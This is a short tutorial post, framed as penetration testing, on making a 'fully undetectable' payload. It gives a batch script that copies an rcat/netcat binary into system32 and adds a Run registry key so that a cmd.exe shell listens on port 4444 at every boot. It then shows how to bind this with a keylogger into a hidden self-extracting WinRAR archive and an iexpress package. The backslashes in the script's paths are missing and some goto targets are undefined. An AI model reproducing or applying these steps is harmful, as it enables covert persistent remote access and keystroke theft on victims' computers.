This post is based on how to bypass Anti-Virus by using FUD (Fully Undetectable). There are many Crypters and binders but manually based is the best in the business. In Penetrating tests FUD Crypter is most important part for ethical hackers.
Metasploit encoders can also be used to bypass antivirus but in this tutorial it is manually made FUD by using netcat as backdoor.
Rcat is can also be used though it is good replica of Netcat and got less chance to get detected. We use a technique to wrap/bind our Package file with it.
Follow the simple steps.
Below is the Code for Create a batch File. This will edit registry windows add your NetCat in System folder.
copy rcat.exe %systemroot%system32rcat.exe
if errorlevel 0 goto regedit
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d “%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe”
if errorlevel 0 goto ip
echo something wrong with the program.
echo write down the IP address from the table
nc -L -p 4444 -t
Now open notepad copy this code in it & save it with name .bat.
Download Rcat latest version. Copy rcat.exe in the same directory where this notepad named .bat exists.
Now we Use WinRAR to combine or BIND there two files (rcat.exe + Notpad).Click on ADD to archive
On the Next window that appear check Create SFX Archive. Go to Advance TAB & click SFX Options. Check out Options as i do
Go to MODES Tab and check on HIDE ALL. Click OK to create a Batch File.
New File will appear at Same Directory. So we have Combined these to files but to make it more we do as follows:
Start Panel >> cmd >> type = iexpress
- Click NEXT, Leave it as Default.
- Choose Package Title e.g TEST.
- Leave as Default until Package FILE appears.
- Now ADD those two files i.e 1st (.exe file that we made by above method ) &2nd (your Key-logger file )
- iExpress will Combine them to make One File.